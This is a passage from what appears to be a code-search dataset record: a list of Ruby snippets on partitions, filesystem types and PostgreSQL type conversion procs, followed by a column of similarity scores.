#{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n create_filesystem(part.fs, label_path, part.label) if part.fs\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n nil\n end",
"def request_class(endpoint)\n subject_service.rpcs[endpoint].request_type\n end",
"def onepartition2fstab(part, other_nr)\n part = deep_copy(part)\n Builtins.y2milestone(\"onepartition2fstab part=%1\", part)\n if Ops.get_boolean(part, \"delete\", false) ||\n Ops.get_symbol(part, \"type\", :unknown) == :extended ||\n Builtins.contains(\n [:lvm, :sw_raid, :evms],\n Ops.get_symbol(part, \"type\", :unknown)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0 ||\n Ops.get_symbol(part, \"enc_type\", :none) != :none &&\n !Ops.get_boolean(part, \"noauto\", false) ||\n !IsUsedBy(part) ||\n Builtins.contains(\n [\n Partitions.fsid_prep_chrp_boot,\n Partitions.fsid_lvm,\n Partitions.fsid_raid\n ],\n Ops.get_integer(part, \"fsid\", 0)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0\n return {}\n end\n\n spec = Ops.get_string(part, \"device\", \"\")\n if Ops.get_symbol(part, \"mountby\", :device) == :label &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"label\", \"\")), 0)\n spec = Builtins.sformat(\"LABEL=%1\", Ops.get_string(part, \"label\", \"\"))\n elsif Ops.get_symbol(part, \"mountby\", :device) == :uuid &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"uuid\", \"\")), 0)\n spec = Builtins.sformat(\"UUID=%1\", Ops.get_string(part, \"uuid\", \"\"))\n end\n Builtins.y2debug(\"onepartition2fstab spec=%1\", spec)\n mount_point = Ops.get_string(part, \"mount\", \"\")\n fsid = Ops.get_integer(part, \"fsid\", 0)\n\n used_fs = Ops.get_symbol(part, \"used_fs\", :ext2)\n format = Ops.get_boolean(part, \"format\", false)\n\n vfstype = \"unknown\" # keep \"unknown\", used again below\n freq = 0\n passno = 0\n mntops = Ops.get_string(part, \"fstopt\", \"\")\n\n if mount_point == \"swap\"\n vfstype = \"swap\"\n if Builtins.isempty(mntops)\n mntops = Ops.get_string(\n FileSystems.GetFstabDefaultMap(\"swap\"),\n \"mntops\",\n \"\"\n )\n end\n passno = 0\n elsif fsid == Partitions.fsid_native || fsid == Partitions.fsid_lvm ||\n Ops.get_symbol(part, \"type\", :unknown) == :evms &&\n Ops.get_symbol(part, \"detected_fs\", :none) != :unknown\n vfstype = FileSystems.GetMountString(used_fs, format ? 
\"ext2\" : \"auto\")\n\n freq = 1\n if mount_point == \"/\"\n passno = 1\n elsif mount_point != \"\"\n passno = 2\n elsif Stage.initial && !Arch.s390\n mount_point = Ops.add(\"/data\", other_nr.value)\n # Don't mount and fsck this filesystem during boot, its\n # state is unknown.\n mntops = \"noauto,user\"\n vfstype = \"auto\"\n freq = 0\n passno = 0\n other_nr.value = Ops.add(other_nr.value, 1)\n Builtins.y2milestone(\"TT add MountPoint %1\", mount_point)\n end\n elsif (Arch.i386 || Arch.ia64 || Arch.x86_64) &&\n Ops.greater_than(Builtins.size(mount_point), 0) &&\n (used_fs == :vfat || used_fs == :ntfs) &&\n (Builtins.contains(\n Builtins.union(\n Builtins.union(\n Partitions.fsid_dostypes,\n Partitions.fsid_ntfstypes\n ),\n Partitions.fsid_wintypes\n ),\n fsid\n ) ||\n fsid == Partitions.fsid_gpt_boot)\n freq = 0\n passno = 0\n lower_point = Builtins.tolower(mount_point)\n if lower_point != \"\" && mount_point != lower_point\n lower_point = PathToDestdir(lower_point)\n Builtins.y2milestone(\n \"symlink %1 -> %2\",\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n SCR.Execute(\n path(\".target.symlink\"),\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n end\n vfstype = FileSystems.GetMountString(used_fs, \"auto\")\n elsif (Arch.sparc || Arch.alpha) &&\n Builtins.contains(Partitions.fsid_skipped, fsid)\n return {} # skip \"whole disk\" partition\n else\n return {} # unknown type\n end\n if Ops.get_symbol(part, \"detected_fs\", :unknown) == :unknown ||\n Ops.get_boolean(part, \"noauto\", false)\n passno = 0\n end\n\n ret = {\n \"spec\" => spec,\n \"mount\" => mount_point,\n \"vfstype\" => vfstype,\n \"mntops\" => mntops,\n \"freq\" => freq,\n \"device\" => Ops.get_string(part, \"device\", \"\"),\n \"passno\" => passno\n }\n\n if Builtins.size(Ops.get_string(ret, \"mntops\", \"\")) == 0\n Ops.set(ret, \"mntops\", \"defaults\")\n end\n\n Builtins.y2milestone(\"onepartition2fstab ret=%1\", ret)\n deep_copy(ret)\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def kind\n type.to_s.underscore[5..-1]\n end",
"def type; self.class.name.split('::').last.to_sym; end",
"def batch_find(type:, query: {}, config: {}, &blk)\n return to_enum(__callee__, type: type, query: query, config: config) unless block_given?\n pm_class = \"PM::#{type.to_s.camelize}\".constantize\n if policy_machine_storage_adapter.respond_to?(:batch_find)\n policy_machine_storage_adapter.batch_find(type, query, config) do |batch|\n yield(batch.map { |elt| pm_class.convert_stored_pe_to_pe(elt, policy_machine_storage_adapter) })\n end\n else\n batch_size = config.fetch(:batch_size, 1)\n method(type.to_s.pluralize).call(query).each_slice(batch_size, &blk)\n end\n end",
"def determine_paragraph_type\n @paragraph_type = \\\n case\n when blank?\n :blank\n when definition_list? # order is important! A definition_list is also an unordered_list!\n :definition_term\n when (ordered_list? or unordered_list?)\n :list_item\n when property_drawer_begin_block?\n :property_drawer_begin_block\n when property_drawer_end_block?\n :property_drawer_end_block\n when property_drawer_item?\n :property_drawer_item\n when metadata?\n :metadata\n when block_type\n if block_should_be_exported?\n case block_type.downcase.to_sym\n when :center, :comment, :example, :html, :quote, :src\n block_type.downcase.to_sym\n else\n :comment\n end\n else\n :comment\n end\n when title?\n :title\n when raw_text? # order is important! Raw text can be also a comment\n :raw_text\n when comment?\n :comment\n when table_separator?\n :table_separator\n when table_row?\n :table_row\n when table_header?\n :table_header\n when inline_example?\n :inline_example\n when horizontal_rule?\n :horizontal_rule\n else :paragraph\n end\n end",
"def fstype\n return self['fstype'] if has_key?('fstype')\n Chef::Log.info([\n self['fstype'], current[:fstype],\n File.exists?(device) && `file -s '#{device}'`.chomp,\n self,\n ].inspect)\n return current[:fstype] if current[:fstype]\n return unless File.exists?(device)\n dev_type_str = `file -s '#{device}'`.chomp\n case\n when dev_type_str =~ /SGI XFS/ then self['fstype'] = 'xfs'\n when dev_type_str =~ /Linux.*(ext[2-4])/ then self['fstype'] = $1\n else\n raise \"Can't determine filesystem type of #{device} -- set it explicitly in node[:volumes]\"\n end\n self['fstype']\n end",
"def identifying_supertype\n ti = identifying_type_inheritance and ti.supertype\n end"
] |
[
"0.554963",
"0.54393864",
"0.54320496",
"0.53941506",
"0.5306165",
"0.5259705",
"0.52464676",
"0.52419007",
"0.52418816",
"0.5201963",
"0.51878047",
"0.5146065",
"0.51062053",
"0.51016784",
"0.507593",
"0.5063504",
"0.5013748",
"0.50104105",
"0.4990257",
"0.49901363",
"0.49874842",
"0.49697834",
"0.49420843",
"0.49420843",
"0.49350438",
"0.48975468",
"0.48703656",
"0.48538652",
"0.48409387",
"0.48391086",
"0.48229352",
"0.48059613",
"0.4802549",
"0.47856337",
"0.47691125",
"0.4739655",
"0.47109902",
"0.47050062",
"0.47037497",
"0.4703164",
"0.469689",
"0.4683273",
"0.46618167",
"0.46565422",
"0.46557954",
"0.46542984",
"0.46487075",
"0.4648528",
"0.46255016",
"0.4622579",
"0.46179193",
"0.46170592",
"0.4611454",
"0.4602863",
"0.4599416",
"0.45906445",
"0.45770147",
"0.45666623",
"0.4558665",
"0.45577234",
"0.4553181",
"0.45526683",
"0.4547399",
"0.45422336",
"0.45411217",
"0.45384917",
"0.45373642",
"0.45341033",
"0.45253098",
"0.45232815",
"0.45232034",
"0.45179418",
"0.45171207",
"0.45131302",
"0.45091796",
"0.45037058",
"0.45034146",
"0.45034066",
"0.4503071",
"0.44858095",
"0.44858095",
"0.4479059",
"0.4476381",
"0.44748962",
"0.44695348",
"0.44690913",
"0.4468618",
"0.44511503",
"0.44446555",
"0.44427958",
"0.4437",
"0.4436314",
"0.44359285",
"0.44319358",
"0.4428153",
"0.4426437",
"0.44209278",
"0.44204706",
"0.44174325",
"0.44153696"
] |
0.74603456
|
0
|
Set a conversion proc for the given oid. The callable can be passed either as an argument or a block.
|
def add_conversion_proc(oid, callable=nil, &block)
conversion_procs[oid] = callable || block
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def add_object_conversion( oid, conversion=nil )\n\t\tconversion = Proc.new if block_given?\n\t\t@object_conversions[ oid ] = conversion\n\tend",
"def add_attribute_conversion( oid, conversion=nil )\n\t\tconversion = Proc.new if block_given?\n\t\t@attribute_conversions[ oid ] = conversion\n\tend",
"def to_proc\n lambda{ call }\n end",
"def to_proc\n proc { |value| self.(value) }\n end",
"def to_proc\n proc { |value| self.(value) }\n end",
"def to_proc\n proc { |value| self.(value) }\n end",
"def to_proc\n ->(input) { call(input) }\n end",
"def to_proc\n ->(*args) {call(*args)}\n end",
"def to_proc() end",
"def to_proc() end",
"def cast_with_proc(obj, type)\n if (type == :proc || obj.is_a?(::Proc)) && obj.respond_to?(:to_source)\n :proc\n else\n cast_without_proc(obj, type)\n end\n end",
"def to_proc\n @to_proc ||= method(:coerce).to_proc\n end",
"def to_proc\n if value = @value\n lambda{ value }\n else\n block = @block\n lambda do |*args|\n instance_exec(*args, &block)\n end\n end\n end",
"def to_proc\n ->(*args, &blk) do\n receiver = args.first\n if (blk)\n receiver.send(self, &blk)\n else\n args[0] = self\n receiver.send(*args)\n end\n end\n end",
"def to_proc\n lambda { |x| }\n end",
"def conversion(&block)\n self.converter = block\n end",
"def converter(a_lamda=nil, &block)\n if a_lamda.nil?\n if block_given?\n # TODO: same the block in such a way that it can be called\n @params[:converter] = block\n else\n error \"converter statement without a procedure #{location}\"\n end\n else\n unless Proc == a_lamda.class\n error \"converter expects a proc/lamda but got a #{a_lamda.class} #{location}\"\n else\n @params[:converter] = a_lamda\n end\n end\n end",
"def to_proc\n to_sym.to_proc\n end",
"def eval_as_proc(obj)\n obj.respond_to?(:call) ? obj.call : obj\n end",
"def to_proc() self ; end",
"def to_proc\n Proc.new {|*args| self.invoke(*args) }\n end",
"def to_proc\n lambda do |v|\n n = Version::Number.parse(v)\n n.send(operator, number)\n end\n end",
"def edit_as(arg = nil, &proc)\n # RAILS_DEFAULT_LOGGER.debug('set edit_as proc to ' + proc.inspect)\n if block_given?\n self.edit_as_proc = proc\n else\n self.edit_as_proc = Proc.new do\n arg.to_s\n end \n end\n end",
"def to_proc\n name, options, registry, variable_name = @name, @options, @registry, @iv_name\n Proc.new do\n build name => options\n registry.inject(instance_variable_get(:\"@#{variable_name}\")) do |value, (method, args, block)|\n value.send(method, *args, &block)\n end\n end\n end",
"def to_proc()\n #This is a stub, used for indexing\n end",
"def to_proc\n method(:call).to_proc\n end",
"def to_proc\n block = @block if @block\n value = @value\n lambda do |target, record|\n value = value.call(record) if value.respond_to? :call\n return target.send(setter, value) unless block\n if value.is_a? Enumerable\n values = value.map { |v| instance_exec(v, &block) }\n target.send(setter, values)\n else\n target.send(setter, instance_exec(value, &block))\n end\n end\n end",
"def convert_value(value, opts)\n if opts[:proc].is_a? Proc\n opts[:proc].(value)\n else\n value\n end\n end",
"def to_proc\n @to_proc ||= method(:transform).to_proc\n end",
"def call_a_proc(&my_proc)\n my_proc.call\nend",
"def to_proc\n -> target { self.call(target) }\n end",
"def to_proc\n -> target { self.call(target) }\n end",
"def to_proc\n -> x { actual(x) }\n end",
"def block_to_proc(&p)\n\tp.call\nend",
"def to_proc\n # since we're immutable we can keep this\n @extern_proc ||= method(:call).to_proc\n end",
"def add_named_conversion_proc(name, &block)\n unless oid = from(:pg_type).where(:typtype=>['b', 'e'], :typname=>name.to_s).get(:oid)\n raise Error, \"No matching type in pg_type for #{name.inspect}\"\n end\n add_conversion_proc(oid, block)\n end",
"def to_proc\n Proc.new { |target| self.call(target) }\n end",
"def to_proc\n Proc.new { |target| self.call(target) }\n end",
"def to_proc\n proc { |n| call(n) }\nend",
"def block=(proc)\n @value = nil\n @block = proc.to_proc\n end",
"def call_proc(val, &proc)\n proc ||= Proc.new { |data| data + \" you\" }\n proc.call(val)\nend",
"def to_proc\n self\n end",
"def set_procmode\n @procmode = Procmode.find(params[:id])\n end",
"def to_proc\n method(:transform).to_proc\n end",
"def my_each_with_proc(prc)\n #self.my_each_with_block(prc)\n #expection a block but passing in a prc\n self.my_each_with_block(&prc) # the & conver the prc back in to a block\n\n end",
"def to_proc\n eval \"Proc.new do\\n#{self}\\nend\"\n end",
"def initialize(proc)\n @proc = proc\n end",
"def call_a_proc(&block)\n block.call\nend",
"def as_proc(bind=nil)\n args_ext = self.args.map { |e| \"#{e} = fd[\\\"#{e}\\\"];\" }\n code = \"Proc.new do |fd|; #{args_ext.join \" \"} #{self.to_code}; end\"\n if bind # All objects have eval value, we bind when not nil\n # CAS::Help.assert(bind, Binding)\n bind.eval(code)\n else\n eval(code)\n end\n end",
"def run_proc_closure(p)\n p.call\nend",
"def proc\n if block_given?\n super\n else\n NamedProc::Proxy::Proc\n end\n end",
"def to_proc\n ->(**properties) { perform(**properties) }\n end",
"def with_key_transform(proc = nil, &block)\n fn = proc || block\n\n raise ArgumentError, \"a block or callable argument is required\" if fn.nil?\n\n handle = Dry::Types::FnContainer.register(fn)\n with(key_transform_fn: handle)\n end",
"def proc_factor(factor)\n Proc.new { |x| x * factor }\nend",
"def takes_a_proc( p )\n p.call\nend",
"def allow_conversion(meth=nil, &block)\n raise ArgumentError if meth.nil? && !block_given?\n self[:allow_conversion] ||= []\n self[:allow_conversion] << (meth || block)\n end",
"def _call_of(method)\n proc{ |*args| send(method, *args) }\n end",
"def on(callback_name, &block)\n raise(ArgumentError, \"Argument 'callback_name' must be a String.\") unless callback_name.is_a?(String)\n raise(ArgumentError, \"Argument 'callback_name' can not be '#{callback_name}'.\") if @@reserved_callbacks.include?(callback_name)\n raise(ArgumentError, \"Must have a Proc.\") unless block_given?\n @procs_callback[callback_name] = block\n return self\nend",
"def set(hook, warn: true, &block)\n Deprecation.warn(self, warning_for_set) if warn\n raise NoBlockGiven, \"a block is required when setting a callback\" unless block_given?\n @callbacks[hook] = proc(&block)\n end",
"def callback=(proc)\n # Save proc to instance variable so that GC doesn't free\n # the proc object before the transfer.\n @callback_proc = proc do |pTrans|\n proc.call(self)\n end\n @transfer[:callback] = @callback_proc\n end",
"def bind(proc=nil, &block)\n (proc || block).call(@value)\n end",
"def default_command_set_proc\n @command_set_proc_obj = closure_obj = {\n :command_called => false,\n :proc_called => false,\n }\n proc do\n closure_obj[:proc_called] = true\n command(\"test\", \"test command\") do\n closure_obj[:command_called] = true\n end\n end\n end",
"def conv_arg(arg, val = []) # :nodoc:\n if conv\n val = conv.call(*val)\n else\n val = proc {|v| v}.call(*val)\n end\n return arg, block, val\n end",
"def to_proc\n @_proc ||=\n begin\n case \n when _options[:_never]\n FALSE_PROC\n when _options[:_always]\n TRUE_PROC\n else\n _make_select_lambda to_hash\n end\n end\n end",
"def register_callback(id, &block)\n callback = block\n @registered_callbacks[id] = callback\n end",
"def register_callback(id, &block)\n callback = block\n @registered_callbacks[id] = callback\n end",
"def register_callback(id, &block)\n callback = block\n @registered_callbacks[id] = callback\n end",
"def register_callback(id, &block)\n callback = block\n @registered_callbacks[id] = callback\n end",
"def default_proc=(new_proc)\n @default = nil\n @default_proc = new_proc\n end",
"def formatter=(proc)\n @formatter = proc\n end",
"def to_proc\n # Use shadows since instance_eval/exec breaks ivars.\n name, arguments = @name, @arguments\n\n Proc.new { public_send(name, *arguments) }\n end",
"def set_func\n @func = Func.find(params[:id])\n end",
"def convert_from_ruby(val)\n @from_ruby.call(val)\n end",
"def define_type_convert(type, &block)\n @conversions ||= {}\n @conversions[type] = block\n end",
"def input_conv_num\n @shell_input_procs << proc do |args|\n args[0] = yield(args[0].to_i) if /^[0-9]+$/ =~ args[0]\n args\n end\n self\n end",
"def to_proc\n lambda { |path| new(path) }\n end",
"def add_observing_proc(id, &block)\n @observing_procs[id] = block\n update\n end",
"def run_handler=(proc)\n check_definition_state(is_method: true)\n tool_class.class_eval do\n define_method(:run, &proc)\n end\n end",
"def set_con_proc\n @con_proc = ConProc.find(params[:id])\n end",
"def callback\n @callback ||= :value.to_proc\n end",
"def exec_proc(fn)\n num = 1\n fn.call # 2 prints\nend",
"def invoke_callback_method(proc, *args) # :nodoc:\n proc.call(*args) if proc.is_a?(Proc)\n end",
"def convert_type_proc(v)\n case v\n when Java::OrgPostgresqlJdbc4::Jdbc4Array\n PGArrayConverter.new(method(:convert_type_proc))\n when Java::OrgPostgresqlUtil::PGobject\n PG_OBJECT_METHOD\n else\n super\n end\n end",
"def Resolve(maybe_proc, context = nil)\n if maybe_proc.is_a? Proc or maybe_proc.is_a? Method\n if context\n if maybe_proc.arity > 0\n context.instance_eval(&maybe_proc)\n else\n # In case it's a lambda with zero arity instance_eval fails\n context.instance_exec(&maybe_proc)\n end\n else\n maybe_proc.()\n end\n else\n maybe_proc\n end\n end",
"def lut_set_proc(lut_key, block)\n lut_proc[lut_key.to_sym] = block\n end",
"def message_handler(&message_proc)\n @message_proc = message_proc\n end",
"def my_method(&the_proc)\n the_proc\nend",
"def invoker(procObj, param1)\n puts \"Invoking #{procObj} on #{param1.to_s}\"\n procObj.call param1\nend",
"def converters=(_arg0); end",
"def initialize(id, processing_methods=[])\n @id, @processing_methods = id, processing_methods\n yield(self) if block_given?\n end",
"def run_block\n p = Proc.new # <1>\n p.call\nend",
"def make_setter( key )\n\t\treturn Proc.new {|new_value| self.namespaced_hash[ key.to_sym ] = new_value }\n\tend",
"def map_char(ident, &block) ; map_primitive(:char, ident, &block) ; end",
"def convert(obj)\n ret = convert_proc.call(obj)\n filters.execute(ret)\n end",
"def set(sym, val)\n root = EM::Rserve::R::RubytoR::Translator.ruby_to_r val\n\n assign(sym, root) do |req|\n req.errback do |err|\n fiber.resume nil\n end\n req.callback do |msg|\n fiber.resume val\n end\n end\n\n Fiber.yield\n end",
"def proc_method(&my_proc)\n puts \"method start\"\n my_proc.call\n puts \"method end\"\nend",
"def register_callback(&block)\n @_aclize_callback = block\n end",
"def default_proc() end",
"def cast_or_call(cc, mod, fun, *args)\n req = t[cc, mod.to_sym, fun.to_sym, args]\n write_berp(req)\n read_berp\n end",
"def callback( which, *args )\n block = instance_variable_get( \"@on_#{which.to_s}\" )\n block.call( *args ) if block\n end"
] |
[
"0.69231147",
"0.65239",
"0.63744646",
"0.6109321",
"0.6109321",
"0.6109321",
"0.6096786",
"0.6083638",
"0.599398",
"0.599398",
"0.5993846",
"0.5963998",
"0.5879365",
"0.5862984",
"0.5833793",
"0.5791118",
"0.5768658",
"0.56523377",
"0.56225663",
"0.5618568",
"0.5593497",
"0.55666244",
"0.5530083",
"0.55249316",
"0.5502549",
"0.54887795",
"0.5480015",
"0.5462138",
"0.54156786",
"0.5390706",
"0.5365996",
"0.5365996",
"0.53651714",
"0.5317038",
"0.53116447",
"0.5306865",
"0.5265177",
"0.5265177",
"0.5230855",
"0.5202294",
"0.5164511",
"0.515289",
"0.5126342",
"0.51247466",
"0.5094765",
"0.5090855",
"0.50828266",
"0.50780445",
"0.5045577",
"0.5032839",
"0.5010959",
"0.4997284",
"0.49838448",
"0.4957421",
"0.49334696",
"0.4905188",
"0.49009645",
"0.49005923",
"0.48913944",
"0.4858712",
"0.4856265",
"0.4853208",
"0.48514235",
"0.48386475",
"0.48372412",
"0.48372412",
"0.48372412",
"0.48372412",
"0.4829602",
"0.48238215",
"0.4822986",
"0.48202112",
"0.4808224",
"0.48021096",
"0.47978878",
"0.47935495",
"0.4773965",
"0.47448263",
"0.47442305",
"0.47408354",
"0.47360858",
"0.4729683",
"0.47242275",
"0.47198492",
"0.47079548",
"0.47004932",
"0.4692085",
"0.46573323",
"0.46436998",
"0.46317267",
"0.46305567",
"0.4628671",
"0.46250522",
"0.46157897",
"0.46097362",
"0.4595904",
"0.45934075",
"0.45906478",
"0.45896176",
"0.4584656"
] |
0.8385225
|
0
|
Add a conversion proc for a named type, using the given block. This should be used for types without fixed OIDs, which includes all types that are not included in a default PostgreSQL installation.
|
def add_named_conversion_proc(name, &block)
unless oid = from(:pg_type).where(:typtype=>['b', 'e'], :typname=>name.to_s).get(:oid)
raise Error, "No matching type in pg_type for #{name.inspect}"
end
add_conversion_proc(oid, block)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def define_type_convert(type, &block)\n @conversions ||= {}\n @conversions[type] = block\n end",
"def register_type(type, &block)\n register CastWhenType.new(type, &block)\n end",
"def cast_with_proc(obj, type)\n if (type == :proc || obj.is_a?(::Proc)) && obj.respond_to?(:to_source)\n :proc\n else\n cast_without_proc(obj, type)\n end\n end",
"def add_conversion_proc(oid, callable=nil, &block)\n conversion_procs[oid] = callable || block\n end",
"def convert_type_proc(v)\n case v\n when Java::OrgPostgresqlJdbc4::Jdbc4Array\n PGArrayConverter.new(method(:convert_type_proc))\n when Java::OrgPostgresqlUtil::PGobject\n PG_OBJECT_METHOD\n else\n super\n end\n end",
"def to_ruby(type_name)\n SIMPLE_TYPES[type_name][1] || lambda {|param| param}\n end",
"def to_detect_type_by(name, &block)\n Reflection.to_detect_type_by(name, &block)\n end",
"def newfiletype(name, &block)\n return if @filetypes&.key?(name)\n\n base_newfiletype(name, &block)\n end",
"def converter(a_lamda=nil, &block)\n if a_lamda.nil?\n if block_given?\n # TODO: same the block in such a way that it can be called\n @params[:converter] = block\n else\n error \"converter statement without a procedure #{location}\"\n end\n else\n unless Proc == a_lamda.class\n error \"converter expects a proc/lamda but got a #{a_lamda.class} #{location}\"\n else\n @params[:converter] = a_lamda\n end\n end\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n# execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def register_type(key, &block)\n raise_type_defined(key) if present?(key)\n types[key] = block\n end",
"def convert_schema_to_type(table_name, *)\n converter = SchemaConverter.new(table_name: table_name, is_snake_case: @is_snake_case)\n yield converter\n @converted_types.concat converter.converted_type_lines\n end",
"def register_block_for(type, &blk); end",
"def type_from_block(name, &block)\n raise ArgumentError unless block_given?\n\n const_set(\n \"InlineType_#{name.to_s.capitalize}\",\n Class.new(Refined) { class_eval(&block) }\n )\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def add_object_conversion( oid, conversion=nil )\n\t\tconversion = Proc.new if block_given?\n\t\t@object_conversions[ oid ] = conversion\n\tend",
"def procedure(returntype, name, number, argtype, &block)\n\t\tnewproc = Procedure.new(number, returntype, argtype, &block)\n\t\tadd_procedure(name, number, newproc)\n\tend",
"def register(type_converter)\n types.push type_converter\n end",
"def cast_type_literal(type)\n type_literal(:type=>type)\n end",
"def add_type_converter(type, r2c, c2r)\n warn \"WAR\\NING: overridding #{type} on #{caller[0]}\" if @@type_map.has_key? type\n @@type_map[type] = [r2c, c2r]\n end",
"def conversion(&block)\n self.converter = block\n end",
"def add_translator( type, &block ) # :yields: type, value\n @translators[ type_name( type ) ] = block\n end",
"def register_type_mapping(runtime_type, puppet_type_or_pattern, _ = nil)\n TypeAsserter.assert_assignable('First argument of type mapping', PRuntimeType::RUBY, runtime_type)\n expr = runtime_type.name_or_pattern\n if expr.is_a?(Array)\n TypeAsserter.assert_instance_of('Second argument of type mapping', TYPE_REGEXP_SUBST, puppet_type_or_pattern)\n register_implementation_regexp(puppet_type_or_pattern, expr)\n else\n TypeAsserter.assert_instance_of('Second argument of type mapping', PTypeType::DEFAULT, puppet_type_or_pattern)\n register_implementation(puppet_type_or_pattern, expr)\n end\n end",
"def add_mapper_for(type, &block)\n mappers[type] = block\n end",
"def register_type(type, klass, method_name, &block)\n end",
"def register(type, &block)\n extensions = @types[type.meta[:database]]\n db_type = type.meta[:db_type]\n\n mod = Module.new(&block)\n ctx = Object.new.extend(mod)\n functions = mod.public_instance_methods.each_with_object({}) { |m, ms|\n ms[m] = ctx.method(m)\n }\n extensions[db_type] = (extensions[db_type] || {}).merge(functions)\n end",
"def register_spec_type(*args, &block); end",
"def coerce_type_to_symbol\n @type = @type.to_sym\n end",
"def register(name, &block)\n\n # Create the message decoder and register it to the handler.\n decoder = ProcMessageDecoder.new block\n @handler.register_decoder name, decoder\n end",
"def to_proc() end",
"def to_proc() end",
"def add_type(type)\n\n # does nothing, types are differentiated by the 'typ' column\n end",
"def infer_Module(o)\n PTypeType::new(PRuntimeType.new(:ruby, o.name))\n end",
"def cast_types; end",
"def sexp_newtype_block\n program = sexp[1]\n\n program.each do |s|\n if s[0] == :method_add_block and\n s[1][0] == :method_add_arg and\n s[1][1][0] == :call and\n s[1][1][1][0] == :const_path_ref and\n s[1][1][1][1][0] == :var_ref and\n s[1][1][1][1][1][0..1] == [:@const, \"Puppet\"] and\n s[1][1][1][2][0..1] == [:@const, \"Type\"] and\n s[1][1][3][0..1] == [:@ident, \"newtype\"] and\n s[2][0] == :do_block\n\n return s[2][2]\n end\n end\n\n []\n end",
"def __on(type_name, &block)\n __node(\"... on #{type_name}\", {}, &block)\n end",
"def add_type(type)\n\n # does nothing, types are differentiated by the 'typ' column\n end",
"def type_name_to_type(params)\n type = types.name_to_type(params[:type_name])\n params[:type] = type\n params.delete(:type_name)\n params\n end",
"def add_type(type)\n end",
"def add(type, filter=nil, &block)\n if((filter.nil? && !block_given?) || (filter && !filter.is_a?(Filter)))\n raise ArgumentError.new('Filter or proc must be provided for filter')\n end\n const = Splib.find_const(type)\n type = const unless const.nil?\n @lock.synchronize do\n @filters[type] ||= {}\n end\n if(block_given?)\n unless(block.arity == 1 || block.arity < 0)\n raise ArgumentError.new('Block must accept a parameter')\n end\n @lock.synchronize do\n @filters[type][:procs] ||= []\n unless(@filters[type][:procs].include?(block))\n @filters[type][:procs] << block\n end\n end\n end\n if(filter)\n @lock.synchronize do\n unless(@filters[type].include?(filter))\n @filters[type][:filters] ||= []\n unless(@filters[type][:filters].include?(filter))\n @filters[type][:filters] << filter\n end\n end\n end\n end\n filter ? block_given? ? [filter, block] : filter : block\n end",
"def register_row_type(db_type, opts=OPTS)\n procs = @conversion_procs\n rel_oid = nil\n array_oid = nil\n parser_opts = {}\n\n # Try to handle schema-qualified types.\n type_schema, type_name = schema_and_table(db_type)\n schema_type_string = type_name.to_s\n\n # Get basic oid information for the composite type.\n ds = from(:pg_type).\n select{[pg_type[:oid], :typrelid, :typarray]}.\n where([[:typtype, 'c'], [:typname, type_name.to_s]])\n if type_schema\n ds = ds.join(:pg_namespace, [[:oid, :typnamespace], [:nspname, type_schema.to_s]])\n schema_type_symbol = :\"pg_row_#{type_schema}__#{type_name}\" \n else\n schema_type_symbol = :\"pg_row_#{type_name}\"\n end\n unless row = ds.first\n raise Error, \"row type #{db_type.inspect} not found in database\"\n end\n # Manually cast to integer using to_i, because adapter may not cast oid type\n # correctly (e.g. swift)\n parser_opts[:oid], rel_oid, array_oid = row.values_at(:oid, :typrelid, :typarray).map(&:to_i)\n\n # Get column names and oids for each of the members of the composite type.\n res = from(:pg_attribute).\n join(:pg_type, :oid=>:atttypid).\n where(:attrelid=>rel_oid).\n where{attnum > 0}.\n exclude(:attisdropped).\n order(:attnum).\n select_map{[:attname, Sequel.case({0=>:atttypid}, pg_type[:typbasetype], pg_type[:typbasetype]).as(:atttypid)]}\n if res.empty?\n raise Error, \"no columns for row type #{db_type.inspect} in database\"\n end\n parser_opts[:columns] = res.map{|r| r[0].to_sym}\n parser_opts[:column_oids] = res.map{|r| r[1].to_i}\n\n # Using the conversion_procs, lookup converters for each member of the composite type\n parser_opts[:column_converters] = parser_opts[:column_oids].map do |oid|\n procs[oid]\n end\n\n # Setup the converter and typecaster\n parser_opts[:converter] = opts.fetch(:converter){HashRow.subclass(db_type, parser_opts[:columns])}\n parser_opts[:typecaster] = opts.fetch(:typecaster, parser_opts[:converter])\n\n parser = Parser.new(parser_opts)\n 